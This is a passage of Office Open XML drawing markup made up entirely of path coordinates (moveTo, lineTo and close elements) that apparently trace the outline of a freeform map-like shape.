                  <a:pt x="17916" y="11766"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17885" y="11775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17859" y="11846"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17890" y="11846"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17937" y="11827"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18005" y="11807"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17993" y="11743"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17958" y="11756"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17937" y="11724"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="18238" y="11724"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18180" y="11775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18139" y="11785"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18102" y="11743"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18056" y="11766"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18056" y="11817"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18134" y="11836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18226" y="11795"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18238" y="11724"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="18481" y="11743"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18460" y="11766"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18419" y="11766"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18367" y="11795"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18356" y="11827"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18294" y="11888"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18269" y="11971"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18257" y="12013"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18264" y="12032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18320" y="12000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18361" y="11897"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18413" y="11859"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18481" y="11795"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18502" y="11766"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18481" y="11743"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="20518" y="11756"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20523" y="11836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20563" y="11949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20575" y="11929"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20554" y="11859"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20538" y="11756"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20518" y="11756"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="20455" y="11878"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20450" y="11929"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20460" y="11949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20497" y="11971"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20523" y="11961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20512" y="11929"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20497" y="11897"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20455" y="11878"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="18050" y="11897"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17993" y="11920"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18066" y="12013"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18092" y="12013"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18097" y="11981"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18076" y="11939"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18050" y="11897"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="20549" y="12013"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20563" y="12093"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20606" y="12093"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20589" y="12042"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20580" y="12042"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20549" y="12013"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="19409" y="12074"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="19383" y="12125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19378" y="12167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19362" y="12237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19341" y="12308"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19346" y="12350"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19336" y="12382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19320" y="12484"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19320" y="12565"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19315" y="12597"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19315" y="12667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19289" y="12770"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19274" y="12853"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19258" y="12914"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19237" y="12988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19190" y="13027"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19138" y="12988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19133" y="12947"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19108" y="12905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19093" y="12905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19056" y="12821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19030" y="12783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18983" y="12741"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18942" y="12658"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18942" y="12629"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18968" y="12555"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18994" y="12484"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18989" y="12433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19009" y="12433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19035" y="12372"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19056" y="12298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19035" y="12237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19020" y="12257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18994" y="12247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18957" y="12289"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18921" y="12247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18905" y="12257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18853" y="12228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18827" y="12167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18792" y="12135"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18756" y="12154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18797" y="12196"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18797" y="12270"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18745" y="12298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18714" y="12279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18672" y="12330"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18641" y="12401"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18652" y="12443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18620" y="12475"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18584" y="12587"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18589" y="12658"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18554" y="12648"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18516" y="12648"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18486" y="12565"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18450" y="12504"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18419" y="12513"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18387" y="12536"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18387" y="12578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18361" y="12555"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18356" y="12597"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18325" y="12616"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18309" y="12667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18269" y="12741"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18252" y="12844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18231" y="12812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18205" y="12873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18222" y="12947"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18196" y="12966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18180" y="12853"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18128" y="12966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18118" y="13040"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18113" y="13101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18071" y="13161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18050" y="13245"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18009" y="13296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17941" y="13335"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17911" y="13335"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17894" y="13348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17885" y="13376"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17843" y="13399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17791" y="13437"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17781" y="13428"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17750" y="13437"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17698" y="13489"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17668" y="13540"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17616" y="13591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17579" y="13684"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17584" y="13582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17553" y="13675"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17548" y="13758"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17538" y="13829"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17522" y="13861"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17506" y="13941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17517" y="13983"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17517" y="14025"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17532" y="14127"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17527" y="14198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17517" y="14147"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17491" y="14105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17496" y="14230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17475" y="14179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17480" y="14230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17496" y="14342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17491" y="14445"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17512" y="14506"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17506" y="14538"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17517" y="14631"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17501" y="14711"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17496" y="14785"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17506" y="14926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17501" y="15000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17475" y="15103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17470" y="15144"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17454" y="15173"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17418" y="15196"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17402" y="15276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17428" y="15298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17475" y="15388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17512" y="15388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17553" y="15388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17590" y="15350"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17626" y="15308"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17642" y="15318"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17687" y="15247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17729" y="15234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17776" y="15225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17823" y="15247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17859" y="15234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17911" y="15234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17941" y="15173"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17967" y="15103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18024" y="15071"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18097" y="15010"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18149" y="15010"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18226" y="14968"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18309" y="14917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18413" y="14907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18460" y="14968"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18497" y="14978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18554" y="15061"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18537" y="15093"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18558" y="15144"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18575" y="15247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18554" y="15318"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18584" y="15369"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18631" y="15257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18678" y="15215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18750" y="15103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18735" y="15196"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18698" y="15266"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18667" y="15350"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18620" y="15420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18678" y="15401"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18730" y="15298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18719" y="15401"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18683" y="15472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18735" y="15481"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18750" y="15542"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18745" y="15606"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18730" y="15709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18745" y="15789"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18787" y="15831"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18818" y="15841"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18844" y="15863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18879" y="15902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18957" y="15799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18994" y="15780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18968" y="15850"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18994" y="15873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19025" y="15934"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19077" y="15873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19119" y="15821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19185" y="15770"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19248" y="15760"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19294" y="15719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19305" y="15667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19336" y="15574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19378" y="15472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19418" y="15411"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19465" y="15286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19501" y="15225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19548" y="15122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19605" y="15051"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19663" y="14926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19694" y="14824"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19708" y="14753"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19750" y="14631"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19772" y="14567"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19797" y="14445"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19793" y="14333"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19812" y="14249"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19823" y="14169"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19823" y="14053"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19793" y="13951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19772" y="13899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19741" y="13810"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19750" y="13665"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19729" y="13684"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19715" y="13633"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19689" y="13665"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19682" y="13511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19657" y="13428"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19668" y="13399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19637" y="13335"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19600" y="13274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19543" y="13203"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19533" y="13110"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19548" y="13040"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19543" y="12924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19533" y="12905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19527" y="12834"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19527" y="12719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19538" y="12658"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19512" y="12606"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19496" y="12545"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19456" y="12597"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19440" y="12494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19444" y="12443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19449" y="12372"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19430" y="12298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19435" y="12237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19418" y="12228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19418" y="12135"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19409" y="12074"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="13765" y="12257"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="13744" y="12321"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13744" y="12401"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13708" y="12494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13682" y="12484"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13687" y="12536"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13666" y="12606"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13619" y="12690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13578" y="12770"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13552" y="12770"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13531" y="12793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13496" y="12821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13470" y="12821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13458" y="12914"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13433" y="12988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13433" y="13110"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13444" y="13203"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13454" y="13264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13444" y="13357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13412" y="13460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13412" y="13502"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13386" y="13521"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13371" y="13624"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13371" y="13717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13386" y="13829"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13386" y="13951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13402" y="14025"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13449" y="14066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13480" y="14105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13531" y="14044"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13583" y="14015"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13614" y="13861"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13645" y="13665"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13692" y="13409"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13729" y="13222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13760" y="13059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13765" y="12947"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13786" y="12914"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13791" y="12863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13781" y="12760"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13795" y="12719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13812" y="12802"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13826" y="12760"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13833" y="12690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13821" y="12629"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13816" y="12462"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13800" y="12372"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13786" y="12321"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13765" y="12257"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="20818" y="12606"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20808" y="12709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20813" y="12751"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20829" y="12741"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20844" y="12760"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20844" y="12648"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20818" y="12606"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="20839" y="12783"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20834" y="12821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20844" y="12873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20865" y="12863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20839" y="12783"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="0" y="12802"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5" y="12873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="12863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="12802"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="12802"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="21600" y="12802"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="21560" y="12853"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21543" y="12853"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21508" y="12886"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21513" y="12937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21555" y="12905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21595" y="12873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21600" y="12802"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="21482" y="12975"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="21466" y="13007"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21440" y="12988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21414" y="13027"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21409" y="13091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21440" y="13110"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21482" y="13091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21496" y="13017"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21482" y="12975"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="20580" y="13357"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20580" y="13399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20606" y="13502"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20636" y="13572"/>
                </a:lnTo>
                <a:lnTo>
